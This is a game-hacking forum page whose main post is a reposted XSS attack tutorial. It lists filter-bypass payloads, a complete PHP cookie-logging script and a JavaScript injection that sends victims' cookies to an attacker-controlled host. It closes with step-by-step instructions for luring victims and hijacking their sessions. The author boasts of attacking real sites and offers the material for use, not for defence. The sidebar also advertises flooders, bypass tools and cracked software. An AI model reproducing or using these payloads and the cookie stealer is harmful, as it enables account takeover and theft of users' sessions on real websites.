Главная Форум Файлы Статьи СОСТАВ ZH&ZHS О НАС GITHUB КАНАЛ YouTube BlackList WhiteList
Добро пожаловать на уникальный игровой портал ZETA-HACK TEAM! Здесь Вы сможете найти самые интересные новости из мира игровой индустрии, найти самые свежие сотфины для различных онлайн игр, общаясь на форуме получать мнения специалистов и помогать тем кто не смог получить нужный ответ в той или иной сфере!
Авторизация Регистрация
Последние обсуждаемые темы на форуме
Последние комментарии к новостям
Топ-10 форумчан
клео на 037 Vitalek 0
Накрутка для вк Vitalek 0
клео 4 Vitalek 0
крякнутый впн Vitalek 0
халявный чит на кс го 2020 Vitalek 0
QUERY flooder AdCKuY_DpO4uLa 2
заявка на модератора Vitalek 0
Как защитить свой хостинг от D... =AlexDrift= 0
Ts3Bypass.c =AlexDrift= 3
KGreenOVHUdp.c =AlexDrift= 2
Driftyulex_m0d ака Drifeit_m0d 0.3e v7.9 22.10.2019
Собейт Driftyulex_m0d 7.9 для CR:MP 0.3e... 22.10.2019
Microsoft назвала дату смерти Windows 7 10.09.2019
MemorandoomXack/devblog 59-60/Чит/Хак/Ha... 04.09.2019
x-gaming dm 0.3e 23.05.2019
x-gaming dm 0.3e 12.05.2019
x-gaming dm 0.3e 12.05.2019
Microsoft назвала дату смерти Windows 7 25.04.2019
[0.3е]Русский ДМ сервер 18.04.2019
[0.3.7]Forward-Evolution DM by [KrYpToDe... 18.04.2019
1. =AlexDrift= 587
2. Pahanch1kkk 46
3. AdCKuY_DpO4uLa 37
4. InFerNo 35
5. R4DUGA 32
6. d1amondl1on 31
7. [NACIONAL]IST_BERZ 23
8. Julia 21
9. Lil_Jonson 17
10. Effect 15
Витрина ссылок Купить ссылку (4 р.) » | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка

  • Страница 1 из 1
  • 1
Форум » Архив » Корзина » XSS Tutorial ara
XSS Tutorial ara
04.12.2017 в 05:25
#1
=AlexDrift=
Не важны козыри если игра не на счет...
Статус: Offline
Регистрация: 24.11.2012
Сообщения: 587
Репутация: 84
Что бы добавить медаль "Легенда портала" добавляем в ?if "or 1='ID пользователя'"
Что бы добавить медаль "Золотой страж" добавляем в ?if "or 1='ID пользователя'"
Код
Hello and thanks for reading this tutorial on XSS, written by me. You may be 

asking as to why I'm creating this tutorial. My inbox has lately been flooding, 

and I've recieved a lot of requests on making this tutorial. I've posted my XSS 

attacks on Google, Facebook, Defense.gov, and other huge sites. I've even 

exploited HackForums' security with XSS.

I saw that nobody actually posted a XSS TUT for those in need so here it is. . .

What is XSS?

XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to 

execute HTML and Javascript on the web-page. This attack can be done by 

submitting queries into text-boxes, or even into the URL. The results come back 

reading the text as HTML, so it executes the scripts instead of displaying them 

in plain text. With an XSS attack, you can steal cookies from a Web-

Administrator, or even use some social-engineering to manipulate someone into 

download a virus that you've created. Such as a Botnet, or RAT, maybe even a 

Keylogger. XSS can be very dangerous, but can also be very mild. Most of my 

attacks are mild XSS attacks, that can be difficult to use against a website. 

There are many ways to use XSS to your advantage. I will name a few examples. 

You can use an alert box to advertise yourself, or alert the web-admin that 

you've discovered a security breach involving XSS. You can also setup a Cookie-

Stealer/Logger. Anything you can do with HTML, can be used against a site with 

this attack. I will explain some of the most important terms associated with 

XSS.

What is HTML and Javascript?

HTML
HTML is sort of like a programming language. The distinctions between a 

programming language, and HTML, are not too far apart. They are both languages, 

that are used to create attributes, and events. HTML is a markup language, which 

is used mostly to create websites. HTML stands for Hyper-Text Markup Language. 

You can use HTML to create forms, buttons, and other stuff that can be used in a 

webpage. I highly doubt you will ever encounter a website that does not contain 

even a slight amount of HTML.

Javascript
Now, first, let's get one thing straight. There is a HUGE difference between 

JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used 

in games, and applications. Javascript is sort of similar to HTML, but 

definitely different in many ways. Javascript isn't used NEARLY as much in 

Webpages than HTML is. Javascript is used, more in applications outside of 

webpages. Like PDFs. Javascript can be an incredibly useful language along with 

HTML. They are both fairly simple to learn, and are very dynamic.

XSS: My first attack.
Now, let's start getting into the really good stuff. In this section, I'll be 

explaining how to use XSS to your advantage. We will also be launching our very 

first attack with XSS, if you know the basics to XSS, you can skip this section, 

because I doubt you will learn anything that you don't briefly know yet.

Now, our first step, is obviously to find a vulnerable site. Finding a site 

vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The 

problem is, it can take time to determine whether the site is really vulnerable. 

With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) 

multiple queries, to test your site for XSS.

Most vulnerable sites will contain a Search, Login, or a Register area. Pretty 

much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many 

people forget this fact, and never use it to their full potential because they 

think it's useless. You can exploit XSS through the source aswell. You can't 

just take any script, and edit the full thing. But editing an "onmouseover" 

script, is definitely an exception. I will be explaining this method of XSS 

later on, for now, we need the complete basics.

Anyways, our site should have some Text-Boxes to input some HTML in. I will 

simply be using a search bar.

So, lets try putting in the most known, BASIC query of all time.

<script>alert("XSS")</script>

That little script, is HTML. It will make a little message pop up, saying "XSS". 

You can edit that part if you like. Just don't edit any other parts of the 

script. Put that into your search bar, and hit enter. Now, if a little alert box 

popped up, you've successfully attacked a site vulnerable to XSS! If no box 

popped up, that is alright, because that means the site has taken some time to 

put in a filter. A filter, is when we search something, then it goes through a 

mini process, basically an inspection. It checks for any malicious (dangerous) 

things. In this case, it will look for XSS. Sometimes, these filters are very 

weak, and can be by-passed very easily, other times, they can be quite difficult 

to bypass. There are a lot of ways to bypass an XSS filter. First, we have to 

find out what the filter is blocking. A lot of the time, it is blockin the 

alert. Here's an example of this kind of filter:

<script>alert("XSS")</script>

>
<script>alert( > XSS DETECTED < )</script>

It will block the quotes. So how the hell do we get passed that? Well, 

thankfully there's a way to encrypt the full message . We will be using a little 

function called "String.FromCharCode". The name of it pretty much explains it 

all. It encrypts our text, into ASCII. An example of this encryption, would be 

like this:

String.fromCharCode(88,83,83)

Yes, it can be a little bit confusing, but with a little bit of explaining, and 

testing, it is quite simple. Here is what our full query will look like:

<script>alert(String.fromCharCode(88,83,83))</script>

You do NOT need ANY quotes in the simple query like that. So lets put that back 

in the search bar, and voila! It worked! We got an alert box saying "XSS"! If 

you still didn't get any alert box, try some of these queries that I like to 

use:
'><script<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><script>alert("XSS")</SCRIPT>
</SCRIPT>"><script>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><script>alert("XSS")</SCRIPT>
</SCRIPT>">'><script>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))

Yes, I just wrote all those down, and it took longer than it should've, but they 

all work in their own way, so try as many of them as you can. I've attacked some 

pretty huge sites with some of those queries. I create my own queries sometimes, 

you should create some too, they can come in handy a lot.

These are just the basic method!

any way : copy-paste version :)
so thik hoile thank u diben .. na hoile gali dibar parben na :P

part 2
======================

=========================
COOKIE STEALING WITH XSS
=========================

I guess you already know a bit of the theory behind XSS, so we'll get right to 

the code.

Let's say a web page has a search function that uses this code:

<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>

We want to exploit this page using XSS. How do we do that? We know that we want 

to inject our own script into the value field (this field is tied to the search 

box we can enter text into). We could start by using a test script:

<script>alert("test")</script>

When we enter this into the search box and click search, nothing happens. Why? 

It's still inside the value quotes, which turn the entire script into plaintext. 

If you look at the page source now, you see that the above portion of code now 

looks like this:

<tr><td>Name</td><td><input type="text" name="advisor_name" 

value="<script>alert("test")</script>"></td></tr>

Note the quotes around our script. So what do we do? We need to end the value 

field before our script can actually be executed. So we tweak our test injection 

a bit:

"><script>alert("test")</script>

This should close the quotes end the input section so that our script can be 

rendered as a part of the source instead of plaintext. And now when we hit enter 

we get a nice pop-up box saying "test", showing us our script was executed. Keep 

in mind that you're not actually writing this data to the server (unless you're 

injecting it with a script that actually modifies the page on the server's end 

also, like a guestbook or comment script), just changing how the dynamic page is 

acting on your end. If you want someone else to see what you see when you use 

this injection, you need to send them the link with that injection already in 

the page. For example.

http://www.site.com/search.php?q"><script>alert("test")</script>

Of course, if you don't want the recipient to see the injection, you'll need to 

hex the query. You can do that here: http://centricle.com/tools/ascii-hex/

Hexing the query of this url gives us

http://www.site.com/search.php?q "><script>alert("test")<%2 fscript>

The above is a very simple case of finding an XSS injection vulnerability. Some 

html and javascript knowledge is definitely helpful for finding more complicated 

ones, but code like the above works often enough.

Using XSS to Steal Cookies

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? 

You want to make it do something useful, like steal cookies. Cookie stealing is 

when you insert a script into the page so that everyone that views the modified 

page inadvertently sends you their session cookie. By modifying your session 

cookie (see the above linked tutorial), you can impersonate any user who viewed 

the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected 

script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt 

and whateveryouwant.php. You can leave log.txt empty. This is the file your 

cookie stealer will write to. Now paste this php code into your cookie stealer 

script (whateveryouwant.php):

=========================================

<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv

("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && 

strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a ");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | 

METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | 

METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>
=========================================

This script will record the cookies of every user that views it.

Now we need to get the vulnerable page to access this script. We can do that by 

modifying our earlier injection:

"><script language= 

"JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie" 

document.cookie;document.location="http://www.whateversite.com/"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, 

and whateversite.com is the vulnerable page you're exploiting. The above code 

redirects the viewer to your script, which records their cookie to your log 

file. It then redirects the viewer back to the unmodified search page so they 

don't know anything happened. Note that this injection will only work properly 

if you aren't actually modifying the page source on the server's end. Otherwise 

the unmodified page will actually be the modified page and you'll end up in an 

endless loop. While this is a working solution, we could eliminate this 

potential issue when using source-modifying injections by having the user click 

a link that redirects them to our stealer:

logData();
?>

to this:

logData();

echo '<b>Page Under Construction</b>'
?>

Now when you open log.txt, you should see something like this:

IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux 

i686; en-US; rv:1.9.0. Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | 

METHOD: | REF: http://www.victimssite.com/search.php |

DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: 

cookie=PHPSESSID=889c6594db2541db1666cefca7537373

You will most likely see many other fields besides PHPSESSID, but this one is 

good enough for this example. Now remember how to edit cookies like I showed you 

earlier? Open up firebug and add/modify all your cookie's fields to match the 

data from the cookie in your log file and refresh the page. The server thinks 

you're the user you stole the cookie from. This way you can log into accounts 

and many other things without even needing to know the passwords or usernames.

1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log 

file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is 

not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.

                             ...::: MUTTAKEE :::...
                    Bangladesh Cyber Army

В ЛС не отвечу даже не старайтесь. Все вопросы на форум, создавайте тему там ответим.

Форум » Архив » Корзина » XSS Tutorial ara
  • Страница 1 из 1
  • 1
Поиск:

условия предоставления
Авторские права и контакты
счетчики
счетчики
счетчики
Файлы, статьи, публикации на форуме предоставлены исключительно в ознакомительных целях. Все материалы принадлежат исключительно их владельцам! Администрация портала не несет ответственности за последствия использования вами сторонних материалов, опубликованных на форуме, каталоге файлов, каталоге статей, но гарантирует отсутствие вредоносного кода в новостях и публикациях на главной. Напоминаем:Весь материал публикуется только для ознакомительных целей! Администрация не несёт ответственности за размещённые материалы. Все материалы предоставлены в ознакомительных целях и администрация предлагает удалить их после ознакомления.
  • Основатель портала - AlexDrift
  • Автор дизайна, разработчик - Lil Jonson
  • По возникшим вопросам дизайна - liljonson682@gmail.com
  • По всем возникшим вопросам - vk.com/alexdrift1137
  • Уникальный игровой портал ZETA-HACK.RU ® 2011 - 2019
  • Сайт создан в системе uCoz

  • Яндекс.Метрика
    Рейтинг@Mail.ru